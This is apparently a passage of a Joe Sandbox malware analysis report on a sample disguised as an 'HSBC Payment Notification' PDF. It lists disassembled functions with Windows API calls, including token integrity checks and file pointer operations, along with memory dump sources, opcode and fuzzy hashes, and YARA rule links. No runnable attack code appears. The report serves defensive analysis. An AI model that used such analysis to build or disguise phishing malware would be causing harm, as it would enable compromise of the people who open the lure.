                                                                                                                                                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2597487223-0
                                                                                                                                                    • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                                                                                                    • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                                                                                                                                                    • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                                                                                                    • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                                                                                                                                                    Function 00404E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                    • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                                                                                                    • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                                                                                                                                                    • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                                                                                                    • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                                                                                                                                                    Function 02F1BC0C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: 3183f7d5e57e092c810b05d380156854195b4b04fd4d03243365d49dc19afada
                                                                                                                                                    • Instruction ID: b52d70fa1eaf49e61e76d7996f8a802cce43cee28cb294bfa942c4252ebf96e4
                                                                                                                                                    • Opcode Fuzzy Hash: 3183f7d5e57e092c810b05d380156854195b4b04fd4d03243365d49dc19afada
                                                                                                                                                    • Instruction Fuzzy Hash: 6EF0E5A1C0C384CEEB25EA09C42833ABBB0AF452DEFCA845DDB9446595D7B98404CB52
                                                                                                                                                    Function 00420791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LongNamePath_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2514874351-0
                                                                                                                                                    • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                                                                                                    • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                                                                                                                                                    • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                                                                                                    • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                                                                                                                                                    Function 00468E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                                                    • Instruction ID: 3b5d1e22e3b7b83ea6e308f8ce2403907d65c91d4ff9c09852f69d04d9ef645c
                                                                                                                                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                                                    • Instruction Fuzzy Hash: BDE092B0204B005BD7388A24D800BA373E1AB05304F00091EF2AAC3341EB67B841C75D
                                                                                                                                                    Function 02F18318 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,?), ref: 02F1832A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InformationToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4114910276-0
                                                                                                                                                    • Opcode ID: c94bb02921ff8ec454448331240915c213fc93ce3da814444e7b47ea336459dd
                                                                                                                                                    • Instruction ID: 96d660301db6a6546e1a9c6703c4ee1ec4847f336ba42900af741b111f570af5
                                                                                                                                                    • Opcode Fuzzy Hash: c94bb02921ff8ec454448331240915c213fc93ce3da814444e7b47ea336459dd
                                                                                                                                                    • Instruction Fuzzy Hash: 8CE0C239B48BC1BFFA2B05204E01A367F28AB829C4FC40848BB4292065C3508C106278
                                                                                                                                                    Function 02F1AAE0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: bbf16f2f1c5ab5d4e48369369ab1b9f1413f7c1ae64439ad48ba4aaee0de8c15
                                                                                                                                                    • Instruction ID: 67675a34bf86aa4b5535a413d63127c0a4e13e2d0f41c2e927e74a67bc360be8
                                                                                                                                                    • Opcode Fuzzy Hash: bbf16f2f1c5ab5d4e48369369ab1b9f1413f7c1ae64439ad48ba4aaee0de8c15
                                                                                                                                                    • Instruction Fuzzy Hash: DFE04F3054E3869FE3429F30C10431EBFE0AF86215F448D9DE9D446481E7B4C54AD742
                                                                                                                                                    Function 02F1BADE Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: 3bd1fa15e3c828fb50f6c50bba16ea225a605f8db31995fd9f05c231be0d4e56
                                                                                                                                                    • Instruction ID: f55ecff98ac07c2d325177e10d906cb11c9b861d8e4c23bb84934096ed0faa42
                                                                                                                                                    • Opcode Fuzzy Hash: 3bd1fa15e3c828fb50f6c50bba16ea225a605f8db31995fd9f05c231be0d4e56
                                                                                                                                                    • Instruction Fuzzy Hash: 68E0CDA0C0D381CFF7145B58C559335BFA07F55289FC6C85DEAD405091DB754054C743
                                                                                                                                                    Function 02F1AB15 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: ddd4119da2cbcf449f39d0289cf000e192157b935cac5166c403b76355fff52d
                                                                                                                                                    • Instruction ID: f99015b9fa4a737baae92caed834476c8e7d1d3bb36ae5e326e2378815ac8516
                                                                                                                                                    • Opcode Fuzzy Hash: ddd4119da2cbcf449f39d0289cf000e192157b935cac5166c403b76355fff52d
                                                                                                                                                    • Instruction Fuzzy Hash: 8FE08C34909704DFF7408F25C50876BBBE0FF88794F80C90CEA9886140E7B8D588DB41
                                                                                                                                                    Function 00405C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,0043DD42,?,?,00000000), ref: 00405C5F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                                                                                                                                                    • Instruction ID: 2996e6a09d4b0f83628727b5f35a7304175fa4664712b8752db8e98aaff89e7d
                                                                                                                                                    • Opcode Fuzzy Hash: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                                                                                                                                                    • Instruction Fuzzy Hash: 75D0C77464020CBFE710DB80DC46FAD777CD705710F200194FD0456290D6B27D548795
                                                                                                                                                    Function 02F1ADBD Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: faa651ff60d03cfd3f5bd91f61ec85dc13814a230677dbf13c75e985f6af9628
                                                                                                                                                    • Instruction ID: 0c62cb7b9fa386c0a349fe4ba5e1eb8ab5d6ae7aaeb85e4a905bbe3dcb482684
                                                                                                                                                    • Opcode Fuzzy Hash: faa651ff60d03cfd3f5bd91f61ec85dc13814a230677dbf13c75e985f6af9628
                                                                                                                                                    • Instruction Fuzzy Hash: 2BD0EC7590E354DADA109F06990839AFBA0AB85664F809A49E5E443180C3B44214DBC2
                                                                                                                                                    Function 02F1A0F0 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: 6bf894a8f4fdf5a4be4b604a6052b96937b3abc72c9383f522c866c84b9eaf65
                                                                                                                                                    • Instruction ID: a382e812f2cfa8757c8fbff854a2ce9981ab29a363aa6aa2a277168c0b6f382f
                                                                                                                                                    • Opcode Fuzzy Hash: 6bf894a8f4fdf5a4be4b604a6052b96937b3abc72c9383f522c866c84b9eaf65
                                                                                                                                                    • Instruction Fuzzy Hash: DED0C751C0E3909EDB2A461454686B537645B411F4FD5074AC371844E193B54E5CC293
                                                                                                                                                    Function 02F19E97 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: 8a2b4eec43a6aa214b4f7e2c9a328b67d72f3d45ea26e6e6d7d12a6b7ffa2a28
                                                                                                                                                    • Instruction ID: f59d07112453d8723e5ba3a52ac9766cce32cc52c7c19499008789d2c0177910
                                                                                                                                                    • Opcode Fuzzy Hash: 8a2b4eec43a6aa214b4f7e2c9a328b67d72f3d45ea26e6e6d7d12a6b7ffa2a28
                                                                                                                                                    • Instruction Fuzzy Hash: 7FD012B15583409FFB409F50C09931AF7D0F745249F80C83CD59546640C7B8480E9F41
                                                                                                                                                    Function 02F1AD84 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,0000004C,?,00000000), ref: 02F1AD99
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: 650b1be84df52a8daa95894bab3726a728ae8eef4992e736c6a88369ef4120fb
                                                                                                                                                    • Instruction ID: 0de1cde18454980883cf3da6988a9403b02314b0d9e19d492313ab35161e43e4
                                                                                                                                                    • Opcode Fuzzy Hash: 650b1be84df52a8daa95894bab3726a728ae8eef4992e736c6a88369ef4120fb
                                                                                                                                                    • Instruction Fuzzy Hash: 53D01232C0F3C08FC71B87308834021BFB25E4B18038BC0C7C2AACB5A396288C08C326
                                                                                                                                                    Function 0042525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wfsopen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 197181222-0
                                                                                                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                    • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                                                                                                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                    • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                                                                                                                                                    Function 0046D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 0046D1FF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                                    • Opcode ID: db3d874e914dce79e7043b4d0cf5498309d9b82b561ceb4573be6442ffe9b797
                                                                                                                                                    • Instruction ID: fca64642930eea01f473371421ac76cd1d6e5c7f539a83d07f9f97c05c5cdcbf
                                                                                                                                                    • Opcode Fuzzy Hash: db3d874e914dce79e7043b4d0cf5498309d9b82b561ceb4573be6442ffe9b797
                                                                                                                                                    • Instruction Fuzzy Hash: 9D717674A043018FC704EF65C491A6AB7E0EF85318F04496EF996973A2DB38ED45CB5B
                                                                                                                                                    Function 02F1823E Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSidSubAuthorityCount.ADVAPI32 ref: 02F18199
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,02F15563), ref: 02F181EB
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,02F15563), ref: 02F1826F
                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,?,?,?,?,02F15563), ref: 02F18280
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,02F15563), ref: 02F1828E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AuthorityCloseCountCurrentErrorHandleInformationLastProcessToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 85819701-0
                                                                                                                                                    • Opcode ID: da85ce1f38623a8dbf3e2215d5ec83eb79731c7b522cc3f2efeb539dbc61dd68
                                                                                                                                                    • Instruction ID: 41ec3974f1c84b49a21663a1b05f6e02e2afe2f2d96bd776eecd08d44f79ce8d
                                                                                                                                                    • Opcode Fuzzy Hash: da85ce1f38623a8dbf3e2215d5ec83eb79731c7b522cc3f2efeb539dbc61dd68
                                                                                                                                                    • Instruction Fuzzy Hash: B1E04827E4C694CAF62F06285F185767A2459035E8BCC0656DF22E3271E3568C14C5A2
                                                                                                                                                    Function 02F18249 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,02F15563), ref: 02F181EB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                    • Opcode ID: f262e65ebd7d8ec71a22938d4d1be7d3be31e7067efaf09a1f69a93ef863ee72
                                                                                                                                                    • Instruction ID: e730242f66639839081701d5965bdfe5816fd256e1563d6897bba08da93fb434
                                                                                                                                                    • Opcode Fuzzy Hash: f262e65ebd7d8ec71a22938d4d1be7d3be31e7067efaf09a1f69a93ef863ee72
                                                                                                                                                    • Instruction Fuzzy Hash: 04D05B37F0CA50927A3F552C4B445376A0479418F47C80714EF73E1154F755C810C0A2
                                                                                                                                                    Function 02F15917 Relevance: 1.3, APIs: 1, Instructions: 18COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle
